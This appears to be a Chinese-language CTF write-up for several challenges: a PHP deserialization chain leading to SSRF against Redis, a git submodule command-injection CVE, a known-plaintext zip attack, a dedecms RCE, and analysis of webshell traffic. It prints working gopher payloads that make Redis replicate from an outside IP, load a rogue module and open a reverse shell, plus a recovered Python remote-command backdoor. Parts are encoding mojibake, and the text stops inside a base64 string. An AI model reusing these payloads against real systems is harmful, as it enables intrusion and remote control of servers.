Ten:
Web
ezezez_php
题目源码
<?php
highlight_file(__FILE__);
include "function.php";
class Rd
{
public $ending;
public $cl;
public $poc;
public function __destruct()
{
echo "All matters have concluded"."</br>";
}
public function __call($name, $arg)
{
foreach ($arg as $key => $value) {
if ($arg[0]['POC'] == "0.o") {
$this->cl->var1 = "get";
}
}
}
}
class Poc
{
public $payload;
public $fun;
public function __set($name, $value)
{
$this->payload = $name;
$this->fun = $value;
}
function getflag($paylaod)
{
echo "Have you genuinely accomplished what you set out to do?"."</br>";
file_get_contents($paylaod);
}
}
class Er
{
public $symbol;
public $Flag;
public function __construct()
{
$this->symbol = True;
}
public function __set($name, $value)
{
if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
$value($this->Flag);
}
else {
echo "NoNoNo,please you can look hint.php"."</br>";
}
}
}
class Ha
{
public $start;
public $start1;
public $start2;
public function __construct()
{
echo $this->start1 . "__construct" . "</br>";
}
public function __destruct()
{
if ($this->start2 === "o.0") {
$this->start1->Love($this->start);
echo "You are Good!"."</br>";
}
}
}
function get($url) {
$url=base64_decode($url);
var_dump($url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
var_dump($result_info);
curl_close($ch);
var_dump($output);
}
if (isset($_POST['pop'])) {
$a = unserialize($_POST['pop']);
} else {
die("You are Silly goose!");
}
?>
链子都是些简单的逻辑就不过多赘述了
<?php
class Ha
{
public $start;
public $start1;
public $start2;
}
class Rd
{
public $ending;
public $cl;
public $poc;
}
class Poc
{
public $payload;
public $fun;
}
class Er
{
public $symbol;
public $Flag;
}
$h1 = new Ha;
$h1->start2 = 'o.0';
$h1->start = array(0=>"POC",'POC'=>'0.o');
$h1->start1 = new Rd;
$h1->start1->cl = new Er;
// $h1->start1->cl->Flag = base64_encode($strs);
//$h1->start1->cl->Flag = base64_encode('dict://127.0.0.1:6379/config:set:stop-writes-on-bgsave-error:no');
$h1->start1->cl->Flag = base64_encode('gopher://0.0.0.0:6379/config%20set%20dir%20/tmp/%0d%0aquit');
$h1->start1->cl->Flag = base64_encode('gopher://0.0.0.0:6379/config%20set%20dbfilename%20exp.so%0d%0aslaveof%208.130.30.76%206666%0d%0aquit');
$h1->start1->cl->Flag = base64_encode('gopher://0.0.0.0:6379/module%20load%20/tmp/exp.so%0d%0asystem.rev%208.130.30.76%206663%0d%0aquit');
$h1->start1->cl->Flag = base64_encode('gopher://127.0.0.1:6379/_%2A3%0D%0A%247%0D%0ASLAVEOF%0D%0A%2411%0D%0A8.130.30.76%0D%0A%244%0D%0A6666%0D%0A%2A4%0D%0A%246%0D%0ACONFIG%0D%0A%243%0D%0ASET%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/tmp/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%246%0D%0Aexp.so%0D%0A%2A3%0D%0A%246%0D%0AMODULE%0D%0A%244%0D%0ALOAD%0D%0A%2411%0D%0A/tmp/exp.so%0D%0A%2A2%0D%0A%2411%0D%0Asystem.exec%0D%0A%243%0D%0Aenv%0D%0A%2A1%0D%0A%244%0D%0Aquit%0D%0A');
echo serialize($h1);
?>
这题的重点就是在于Er类里面的
$value($this->Flag);
由于$value在Rd类被赋值成了get,我们无法控制,不然直接就可以看flag了。
来到get方法是一个ssrf漏洞
function get($url) {
$url=base64_decode($url);
var_dump($url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
var_dump($result_info);
curl_close($ch);
var_dump($output);
}
当时一直想着写shell,所以弄了很长时间,最后看正则表达式发现跟我直接在buuctf上做的 网鼎杯2020年玄武组的SSRFme是一样的
所以下面我就是靠主从复制直接执行env命令查看flag值
借助两个脚本加一个.so文件
https://github.com/xmsec/redis-ssrf
https://github.com/n0b0dyCN/redis-rogue-server
先将redis-rogue-server里面的exp.so文件放在redis-ssrf目录下,然后编辑ssrf-redis.py
其它的也就不用动了,这题是未授权不需要设置密码啥的,也不用绕过ip的限制
生成得到一个gohper协议的数据
放到上面写的payload里,然后将rogue-server.py脚本循环跑起来,因为exp.so需要上传到靶机上,而redis基本上连接一次就断了,这样会影响我们最终的命令执行
while [ "1" = "1" ]
do
python rogue-server.py
done
这里面的报错不用管,直接到浏览器里攻击就可以了,一次不行是因为exp.so没有上传成功,多发几次就好了
misc
下载附件得到一张图片
通过010查看发现存在压缩包
提取出来,压缩包内容
并且注释里面还给了一个提示,很明显这个文件名是要我们自己写脚本然后进行处理,解base64
import re
file1 = zipfile.ZipFile('flag.zip','r')
tmpname = {}
for i in file1.namelist():
res = i.encode('cp437').decode('gbk')
r = re.findall('[A-Za-z0-9-=+]+',res)
if len(r) == 2 and r[0] != "flag":
tmpname.update({r[0]:r[1]})
strs = ""
for v in range(2,10899):
strs += tmpname[str(v)]
#这里要出来一下,base64里面没有-,根据提示我们需要改成/
print(strs.replace("-","/"))
然后到在线网址解一下
这个文件头zip头,复制到010editor里面补齐打开,解压缩,是这样的一个图片
这个图片在里面一层的压缩包里有,说明这里需要明文攻击
然后将其解压
flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}
modules
题目首页
点击~/.ssh/config链接根据里面的信息搜索
host *.ichunqiu.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
发现是一个cve漏洞CVE-2023-51385 https://blog.csdn.net/weixin_46944519/article/details/135249657
此漏洞可以执行命令,但是是没有回显的,当时想反弹shell直接在.gitmodules文件里写反弹shell的命令但是发现怎么弄也不行,后来经过本地调试,发现只要把反弹shell的命令写入到exp.sh里面,然后在.gitmodules文件执行这个脚本就可以反弹shell了
https://gitee.com/ziqiuzq/CVE-2023-51385_test3 这个链接是我根据上面的文章里提供的poc,fork下来的
然后复制url到题目首页进行提交
再回到服务器上,已经得到shell
明文混淆
题目附件
先尝试了密码爆破,发现基本上爆不出来,伪加密可以解,但是文件内容是乱码
不是伪加密也不是爆破,crc就更不可能了,常见的压缩包破解手段那就只剩下明文攻击了,恰好跟题目名对应上了
shell2.php肯定是不能当作明文攻击去使用了,因为它里面肯定被混淆了
经过我本地的一些license.txt文件的对比,发现大多数文件内容都是大同小异
所以我在网上找了一个和压缩包里面显示的大小差不多的文件,然后想着用ARCHPR工具直接导入进行明文攻击
但是一运行就爆这个错误
我也没时间去研究,直接换bkcrack
./bkcrack -C mingwen_aa760d446aaae9033ba325b5a324cb7b.zip -c LICENSE.txt -p LICENSE.txt
-C指定压缩包
-c 指定要攻击压缩包里的某个文件
-p 指定明文
┌──(root㉿Ten)-[~/tools/bkcrack-1.6.0-Linux]
└─# ./bkcrack -C mingwen_aa760d446aaae9033ba325b5a324cb7b.zip -c LICENSE.txt -p LICENSE.txt
bkcrack 1.6.0 - 2024-01-02
[16:12:31] Z reduction using 35814 bytes of known plaintext
12.6 % (4507 / 35814)
[16:12:32] Attack on 30 Z values at index 31432
Keys: 7163444a 203b76b0 17de1387
73.3 % (22 / 30)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 22
[16:12:32] Keys
7163444a 203b76b0 17de1387
得到了三个密钥,然后将文件提取出来
┌──(root㉿Ten)-[~/tools/bkcrack-1.6.0-Linux]
└─# ./bkcrack -C mingwen_aa760d446aaae9033ba325b5a324cb7b.zip -c shell2.php -k 7163444a 203b76b0 17de1387 -d shell2.php
bkcrack 1.6.0 - 2024-01-02
[16:13:55] Writing deciphered data shell2.php (maybe compressed)
Wrote deciphered data.
然后在网上看了一下,这是微盾php混淆
然后使用这个网址做解混淆的第一步https://www.unphp.net/
将这一段复制到shell2.php里面,将eval换成echo
最终就可以得到
echo(gzinflate(base64_decode(‘U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==’)));
输出就可以得到flag
挑战
ezdede
题目首页
dedecms,最新版的漏洞RCE网上有一篇文章,跟着看一遍流程
https://xz.aliyun.com/t/8056?time__1311=n4%2BxuDgDBADQYBKmx0HwbG%3Di%3DA9LhDhDiKx&alichlgref=https%3A%2F%2Fwww.google.com.hk%2F
在注入的时候,可以发现常用的命令执行似乎都被禁用了,原本我还以为是被作者修复了
但是后来发现echo 123是可以的
那也就是说明可以正常执行php代码,标签也没被过滤,那就简单了后面测试file_get_contents函数可不可以用
可以,那就直接尝试读取flag
一血拿下,这应该是作者过滤的不严谨吧,哈哈哈ing
勒索流量
题目附件
给了一个流量包,先使用strings大致的看一下内容
有命令执行的痕迹,直接过滤system
从这条流一个一个追踪下去,可以发现他是先上传了一个一句话木马
而且上传测试了好几个文件
这里都不是很关键,我就跳过了,后面他主要是依靠蚁剑的马去做了一些操作
蚁剑流量分析这个网上文章一大堆
https://blog.csdn.net/qq_51323560/article/details/130679103
蚁剑流量执行命令的话主要看最后一个传参的base64编码,然后删去前面的两个字符就可以解密
解回显的内容的话就是删除前面和后面的十六进制
Y2QgL2QgIkM6L1NvZnR3YXJlL1BocHN0dWR5X3Byby9XV1cvY3RmL3VwbG9hZCImaXBjb25maWcmZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:/Software/Phpstudy_pro/WWW/ctf/upload"&ipconfig&echo cba51c2ce5&cd&echo 35961ea
[..ÝÜÈ.T.1y5°ÃB.B.B´µ3*ó~2²±y1½È4µ3*ó~..B.B...0ïs9uí3+............................0ïs9t´m³î¬.ËÝ0Т....ËÝ<Í.j.\B.Då2.¯={¢.â.â.â.â.â.â.â.¢.РЬíìýÖÓòÍøÊÊÅäÆ÷ ±¾µØÁ¬½Ó* 11:
ýÌå״̬ . . . . . . . . . . . . : ýÌåÒѶϺ°k/tÃB...0k/tó6-ª-q....È.¼õî..................B.B³·³÷[OË7ã++...Ü.Æú×c.²÷L¨.ÄÈè4(4(....÷3.^Ó2°..¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è..÷3.KFÛ>êÁ¬½Ó
Á¬½ÓÌض¨µÄ DNS ºó׺ . . . . . . . :
ÒÔÌ«Í2²±y1½È..]Ø\.H..].ÛÜ.È.Y.\..\...[.].N.B.B...0k/tó6-ª-q....È.¼õî..................B...,o.v0m/tÈ.T...-v5.Ë...................N.....XÍN......Ì....ÍL.ÉLM.B....T...-v5.È...........................NL..M...LLK.CB...5ôó~4v°ºÈ.............................MK..MK..MK..B...1+23ó~.v.............................B.B´µ3*ó~2²±y1½È..]Ø\.H..].ÛÜ.È.Y.\..\...[.]...B.B...0k/tó6-ª-q....È.¼õî..................B...,k]..KÝ2...cb.].krâ.â.â.â.â.â.â.â.¢.fS..£¦C3c3£&VFS£c...£ssc.S.@Т.....cB.].kr.â.â.â.â.â.â.â.â.â.â.â.â.¢..."ã.c.ãsBã.Т..
}<ÓGk.¬..¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.ÈÔÔ¸ÈÔÔ¸ÈÔÔ¸À4(....³#?7âç`¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.4(4+KS2¯4ÊÊÅäÆ÷ VMware Network Adapter VMnet4:
Á¬½ÓÌض¨µÄ DNS ºó׺ . . . . . . . :
±¾µØÁ´½Ó IPv6 µØÖ·. . . . . . . . : fe80::2ba9:fbd6:78a0:e4c9%19
IPv4 µØÖ· . . . . . . . . . . . . : 192.168.110.1
×ÓÍøÑÚÂë . . . . . . . . . . . . : 255.255.255.0
ĬÈÏÍø¹Ø. . . . . . . . . . . . . :
ÒÔÌ«ÍøÊÊÅäÆ÷ VMware Network Adapter VMnet10:
Á¬½ÓÌض¨µÄ DNS ºó׺ . . . . . . . :
±¾µØÁ´½Ó IPv6 µØÖ·. . . . . . . . : fe80::fe4a:ad24:3e0d:babc%12
IPv4 µØÖ· . . . . . . . . . . . . : 10.10.10.1
×ÓÍøÑÚÂë . . . . . . . . . . . . : 255.255.255.0
ĬÈÏÍø¹Ø. . . . . . . . . . . . . :
ÒÔÌ«ÍøÊÊÅäÆ÷ VMware Network Adapter VMnet13:
Á¬½ÓÌض¨µÄ DNS ºó׺ . . . . . . . :
±¾µØÁ´½Ó IPv6 µØÖ·. . . . . . . . : fe80::49e8:87fd:34cc:66c5%29
IPv4 µØÖ· . . . . . . . . . . . . : 192.168.52.1
×ÓÍøÑÚÂë . . . . . . . . . . . . : 255.255.255.0
ĬÈÏÍ.v.............................B.B´µ3*ó~2²±y1½È..]Ø\.H..].ÛÜ.È.Y.\..\...[.].M..B.B...0k/tó6-ª-q....È.¼õî..................B...,k]..KÝ2...cb.].krâ.â.â.â.â.â.â.â.¢.fS..££vS.#¦S.sS¦c#f#£3VSRS#.Т.....cB.].kr.â.â.â.â.â.â.â.â.â.â.â.â.¢..."ã.c.ã.2ã.Т..
}<ÓGk.¬..¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.ÈÔÔ¸ÈÔÔ¸ÈÔÔ¸À4(....³#?7âç`¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.4(4+KS2¯4ÊÊÅäÆ÷ VMware Network Adapter VMnet2:
Á¬½ÓÌض¨µÄ DNS ºó׺ . . . . . . . :
±¾µØÁ´½Ó IPv6 µØÖ·. . . . . . . . : fe80::17e8:7cd7:2dca:ede2%3
IPv4 µØÖ· . . . . . . . . . . . . : 192.168.56.1
×ÓÍ4v°ºÈ.............................MK..MK..MK..B...1+23ó~.v.............................B.B´µ3*óL¬¬^Lor.d×v.&R.æWGv÷&²..F..FW".dÖæWC3 РТ....ËÝ<Í.j.\B.Då2.¯={¢.â.â.â.â.â.â.â.¢.Т....ë]..KÝ2...cb.].krâ.â.â.â.â.â.â.â.¢.fS..££v#.3£VF.3¦#...¦3&C.S.PТ..
}Kjü^Ml2...cB.].kr..â.â.â.â.â.â.â.¢..c.ã#SBã...ã..@Т..
}<ß..¬.²..â.â.â.â.â.â.â.â.â.â.â.â.¢.#SRã#SRã.ã.Т...JÌ.üß...â.â.â.â.â.â.â.â.â.â.â.â.â.¢.РЬíìýûím?,Ó++...Ü.]1.8.Èè4(4(....²÷O3bÚ¢×...9L.ëÏ^è.¸.¸.¸.¸.¸.¸.¸.è.4(...Æú×c.Ò÷L.%AØØ.×cZܸ.¸.¸.¸.¸.¸.¸.¸.è...àÀèèå.ØÌé...ÜèÍ..Üèá.å..à4(...%AØÐ.×cZÜ.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.ÄäȸÄØà¸ÌĸÐÈ4(..._O7ãGk.¬..¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.ÈÔÔ¸ÈÔÔ¸ÈÔÔ¸À4(....³#?7âç`¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.¸.è.ÄäȸÄØà¸ÌĸÄ4(4+KS2¯7ã++...Ü.Ù.Ñ¡.ɹ.Ð.¡....Õ±Ð.MÝ¥Ñ. ¤è4(4(....²÷O3bÚ¢×...9L.ëÏ^è.¸.¸.¸.¸.¸.¸.¸.è.4(...ƵØÁ´½Ó IPv6 µØÖ·. . . . . . . . : fe80::f287:e921:7c8c:6639%30
IPv4 µØÖ· . . . . . . . . . . . . : 172.22.48.1
×ÓÍøÑÚÂë . . . . . . . . . . . . : 255.255.240.0
ĬÈÏÍø¹Ø. . . . . . . . . . . . . :
cba51c2ce5
C:\Software\Phpstudy_pro\WWW\ctf\upload
35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZ0YXNrbGlzdCZlY2hvIGNiYTUxYzJjZTUmY2QmZWNobyAzNTk2MWVh
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&tasklist&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6L1NvZnR3YXJlL1BocHN0dWR5X3Byby9XV1cvY3RmL3VwbG9hZCImaXBjb25maWcmZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:/Software/Phpstudy_pro/WWW/ctf/upload"&ipconfig&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZ0YXNrbGlzdCZlY2hvIGNiYTUxYzJjZTUmY2QmZWNobyAzNTk2MWVh
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&tasklist&echo cba51c2ce5&cd&echo 35961ea
Li8JMjAyNC0wMS0xOCAxNToxNzo0OQk0MDk2CTA3NzcKLi4vCTIwMjQtMDEtMTEgMTE6NTk6NTUJNDA5NgkwNzc3Ci51c2VyLmluaQkyMDI0LTAxLTE4IDE1OjE3OjI2CTIzCTA2NjYKMS5QSFAJMjAyNC0wMS0xOCAxNToxNjoyNgkyNQkwNjY2CjEuUEhQMwkyMDI0LTAxLTE4IDE1OjE3OjAyCTI1CTA2NjYKMS5QaHRtbAkyMDI0LTAxLTE4IDE1OjE2OjE4CTI1CTA2NjYKMS5wbmcJMjAyNC0wMS0xOCAxNToxNzo0OQkyNQkwNjY2CmluZGV4LnBocAkyMDIzLTExLTAyIDExOjE2OjEwCTI4CTA2NjYK
./ 2024-01-18 15:17:49 4096 0777
../ 2024-01-11 11:59:55 4096 0777
.user.ini 2024-01-18 15:17:26 23 0666
1.PHP 2024-01-18 15:16:26 25 0666
1.PHP3 2024-01-18 15:17:02 25 0666
1.Phtml 2024-01-18 15:16:18 25 0666
1.png 2024-01-18 15:17:49 25 0666
index.php 2023-11-02 11:16:10 28 0666
追踪到41流时,发现一大串十六进制
将其放进010里
这个特征一看就是docx
接着往下追
QzovU29mdHdhcmUvUGhwc3R1ZHlfcHJvL1dXVy9jdGYvdXBsb2FkLw%3D%3D
C:/Software/Phpstudy_pro/WWW/ctf/upload/
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZkaXImZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&dir&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZ0eXBlIOWLkue0ouS%2FoS5kb2N4JmVjaG8gY2JhNTFjMmNlNSZjZCZlY2hvIDM1OTYxZWE%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&type 勒索信.docx&echo cba51c2ce5&cd&echo 35961ea
Li8JMjAyNC0wMS0xOCAxNToyMjoyOQk0MDk2CTA3NzcKLi4vCTIwMjQtMDEtMTEgMTE6NTk6NTUJNDA5NgkwNzc3Ci51c2VyLmluaQkyMDI0LTAxLTE4IDE1OjE3OjI2CTIzCTA2NjYKMS5QSFAJMjAyNC0wMS0xOCAxNToxNjoyNgkyNQkwNjY2CjEuUEhQMwkyMDI0LTAxLTE4IDE1OjE3OjAyCTI1CTA2NjYKMS5QaHRtbAkyMDI0LTAxLTE4IDE1OjE2OjE4CTI1CTA2NjYKMS5wbmcJMjAyNC0wMS0xOCAxNToxNzo0OQkyNQkwNjY2CmluZGV4LnBocAkyMDIzLTExLTAyIDExOjE2OjEwCTI4CTA2NjYKczNjcmVULnR4dAkyMDI0LTAxLTE4IDE1OjIyOjI5CTE2CTA2NjYK5YuS57Si5L+hLmRvY3gJMjAyNC0wMS0xOCAxNToyMTo0MgkxMDU1MAkwNjY2Cg==
./ 2024-01-18 15:22:29 4096 0777
../ 2024-01-11 11:59:55 4096 0777
.user.ini 2024-01-18 15:17:26 23 0666
1.PHP 2024-01-18 15:16:26 25 0666
1.PHP3 2024-01-18 15:17:02 25 0666
1.Phtml 2024-01-18 15:16:18 25 0666
1.png 2024-01-18 15:17:49 25 0666
index.php 2023-11-02 11:16:10 28 0666
s3creT.txt 2024-01-18 15:22:29 16 0666
å..ç´¢ä¸K..ØÞ.L....L.KLN..MN..N...LL
ML.L
....
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZkaXImZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&dir&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZ0eXBlIHMzY3JlVC50eHQmZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&type s3creT.txt&echo cba51c2ce5&cd&echo 35961ea
UkBuczBtd2FyM19WMXJ1NWNiYTUxYzJjZTUNCkM6XFNvZnR3YXJlXFBocHN0dWR5X3Byb1xXV1dcY3RmXHVwbG9hZA0KMzU5NjFlYSANCg==
R@ns0mwar3_V1ru5cba51c2ce5
C:\Software\Phpstudy_pro\WWW\ctf\upload
35961ea
这里要注意,根据蚁剑流量的特征,这不是正确的格式,正确格式如下
R@ns0mwar3_V1ru5
cba51c2ce5
C:\Software\Phpstudy_pro\WWW\ctf\upload
35961ea
跟踪到49流发现了加密用的py脚本
import socket
from Crypto.Cipher import ARC4
import base64
import os
import json
import hashlib
def calculate_md5(string):
md5_hash = hashlib.md5()
md5_hash.update(string.encode('utf-8'))
md5_hex = md5_hash.hexdigest()
return md5_hex
from Crypto.Cipher import ARC4
import base64
import json
with open("./s3creT.txt", "r") as f:
key = f.read()
key = calculate_md5(key)
def rc4_encrypt(data, key1):
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.encrypt(data.encode('utf-8'))
res = base64.b64encode(res)
res = str(res, 'utf-8')
return res
def rc4_decrypt(data, key1):
data = base64.b64decode(data)
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.decrypt(data)
res = str(res, 'gbk', errors='ignore')
return res
def t1(data):
import re
from datetime import datetime, timedelta
current_time = datetime.now()
target_time = current_time.replace(second=0, microsecond=0)
timestamp = int(target_time.timestamp())
key1 = hex(timestamp)[2:].zfill(8)
key1 = re.findall(r'.{2}', key1)
key1 = [int(i, 16) for i in key1]
data = list(data)
for i in range(len(data)):
data[i] = chr(ord(data[i]) ^ key1[i % 4])
data = ''.join(data)
return data
def decrypt(data, key):
data = t1(data)
data = rc4_decrypt(data, key)
return data
def encrypt(data, key):
data = rc4_encrypt(data, key)
data = t1(data)
return data
def system(cmd):
res = os.popen(cmd).read()
return res if res else "NoneResult"
def main():
ip = '192.168.31.42'
port = 8899
socket_server = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
socket_server.bind((ip, port))
socket_server.listen(1)
while True:
conn, addr = socket_server.accept()
with conn:
print("connect::", addr)
try:
while True:
data = conn.recv(102400)
# print("server recevie peername and data:", conn.getpeername(), data.decode())
if data:
data = data.decode()
data = decrypt(data, key)
data = json.loads(data)
if data["opcode"] == "shell":
print("shellCMD::", data["msg"])
res = system(data["msg"])
print("res::", res)
conn.sendall(encrypt(res, key).encode())
else:
break
except ConnectionResetError as e:
print("远程连接断开")
if __name__ == '__main__':
main()
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZ0eXBlIHNlcnZlci5weSZlY2hvIGNiYTUxYzJjZTUmY2QmZWNobyAzNTk2MWVh
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&type server.py&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZkaXImZWNobyBjYmE1MWMyY2U1JmNkJmVjaG8gMzU5NjFlYQ%3D%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&dir&echo cba51c2ce5&cd&echo 35961ea
Y2QgL2QgIkM6XFxTb2Z0d2FyZVxcUGhwc3R1ZHlfcHJvXFxXV1dcXGN0ZlxcdXBsb2FkIiZweXRob24gc2VydmVyLnB5JmVjaG8gY2JhNTFjMmNlNSZjZCZlY2hvIDM1OTYxZWE%3D
cd /d "C:\\Software\\Phpstudy_pro\\WWW\\ctf\\upload"&python server.py&echo cba51c2ce5&cd&echo 35961ea
1VHJhY2ViYWNrIChtb3N0IHJlY2VudCBjYWxsIGxhc3QpOg0KICBGaWxlICJDOlxTb2Z0d2FyZVxQaHBzdHVkeV9wcm9cV1dXXGN0Zlx1cGxvYWRcc2VydmVyLnB5IiwgbGluZSAxMDcsIGluIDxtb2R1bGU+DQogICAgbWFpbigpDQogIEZpbGUgIkM6XFNvZnR3YXJlXFBocHN0dWR5X3Byb1xXV1dcY3RmXHVwbG9hZFxzZXJ2ZXIucHkiLCBsaW5lIDgxLCBpbiBtYWluDQogICAgc29ja2V0X3NlcnZlci5iaW5kKChpcCwgcG9ydCkpDQpPU0Vycm9yOiBbV2luRXJyb3IgMTAwNDhdIM2os6PDv7j2zNe909fWtdjWtyjQrdLpL834wue12Na3L7bLv9op1rvUytDtyrnTw9K7tM6how0KY2JhNTFjMmNlNQ0KQzpcU29mdHdhcmVcUGhwc3R1ZHlfcHJvXFdXV1xjdGZcdXBsb2FkDQozNTk2MWVhIA0K
ÕQÉ......¬.¡µ½ÍÐ.É...¹Ð...±°.±.ÍФè4(...¥±....éqM½.ÑÝ.É.qA¡ÁÍÑÕ.å}Áɽq]]]q.Ñ.qÕÁ±½..qÍ.ÉÙ.ȹÁä.°.±¥¹..ÄÀÜ°.¥¸.ñµ½.Õ±.
main()
File "C:\Software\Phpstudy_pro\WWW\ctf\upload\server.py", line 81, in main
socket_server.bind((ip, port))
OSError: [WinError 10048] ͨ³£Ã¿¸öÌ×½Ó×ÖµØÖ·(Ð.Òé/ÍøÂçµØÖ·/¶Ë¿Ú)Ö»ÔÊÐíʹÓÃÒ»´Î¡£
cba51c2ce5
C:\Software\Phpstudy_pro\WWW\ctf\upload
35961ea
很明显运行报错了,端口出现了问题,这里就是关键的一个点了
448102aW1wb3J0IHNvY2tldApmcm9tIENyeXB0by5DaXBoZXIgaW1wb3J0IEFSQzQKaW1wb3J0IGJhc2U2NAppbXBvcnQgb3MKaW1wb3J0IGpzb24KaW1wb3J0IGhhc2hsaWIKCgpkZWYgY2FsY3VsYXRlX21kNShzdHJpbmcpOgogICAgbWQ1X2hhc2ggPSBoYXNobGliLm1kNSgpCiAgICBtZDVfaGFzaC51cGRhdGUoc3RyaW5nLmVuY29kZSgndXRmLTgnKSkKICAgIG1kNV9oZXggPSBtZDVfaGFzaC5oZXhkaWdlc3QoKQogICAgcmV0dXJuIG1kNV9oZXgKCgpmcm9tIENyeXB0by5DaXBoZXIgaW1wb3J0IEFSQzQKaW1wb3J0IGJhc2U2NAppbXBvcnQganNvbgoKd2l0aCBvcGVuKCIuL3MzY3JlVC50eHQiLCAiciIpIGFzIGY6CiAgICBrZXkgPSBmLnJlYWQoKQprZXkgPSBjYWxjdWxhdGVfbWQ1KGtleSkKCgpkZWYgcmM0X2VuY3J5cHQoZGF0YSwga2V5MSk6CiAgICBrZXkgPSBieXRlcyhrZXkxLCBlbmNvZGluZz0ndXRmLTgnKQogICAgZW5jID0gQVJDNC5uZXcoa2V5KQogICAgcmVzID0gZW5jLmVuY3J5cHQoZGF0YS5lbmNvZGUoJ3V0Zi04JykpCiAgICByZXMgPSBiYXNlNjQuYjY0ZW5jb2RlKHJlcykKICAgIHJlcyA9IHN0cihyZXMsICd1dGYtOCcpCiAgICByZXR1cm4gcmVzCgoKZGVmIHJjNF9kZWNyeXB0KGRhdGEsIGtleTEpOgogICAgZGF0YSA9IGJhc2U2NC5iNjRkZWNvZGUoZGF0YSkKICAgIGtleSA9IGJ5dGVzKGtleTEsIGVuY29kaW5nPSd1dGYtOCcpCiAgICBlbmMgPSBBUkM0Lm5ldyhrZXkpCiAgICByZXMgPSBlbmMuZGVjcnlwdChkYXRhKQogICAgcmVzID0gc3RyKHJlcywgJ2diaycsIGVycm9ycz0naWdub3JlJykKICAgIHJldHVybiByZXMKCgpkZWYgdDEoZGF0YSk6CiAgICBpbXBvcnQgcmUKICAgIGZyb20gZGF0ZXRpbWUgaW1wb3J0IGRhdGV0aW1lLCB0aW1lZGVsdGEKICAgIGN1cnJlbnRfdGltZSA9IGRhdGV0aW1lLm5vdygpCiAgICB0YXJnZXRfdGltZSA9IGN1cnJlbnRfdGltZS5yZXBsYWNlKHNlY29uZD0wLCBtaWNyb3NlY29uZD0wKQogICAgdGltZXN0YW1wID0gaW50KHRhcmdldF90aW1lLnRpbWVzdGFtcCgpKQogICAga2V5MSA9IGhleCh0aW1lc3RhbXApWzI6XS56ZmlsbCg4KQogICAga2V5MSA9IHJlLmZpbmRhbGwocicuezJ9Jywga2V5MSkKICAgIGtleTEgPSBbaW50KGksIDE2KSBmb3IgaSBpbiBrZXkxXQogICAgZGF0YSA9IGxpc3QoZGF0YSkKICAgIGZvciB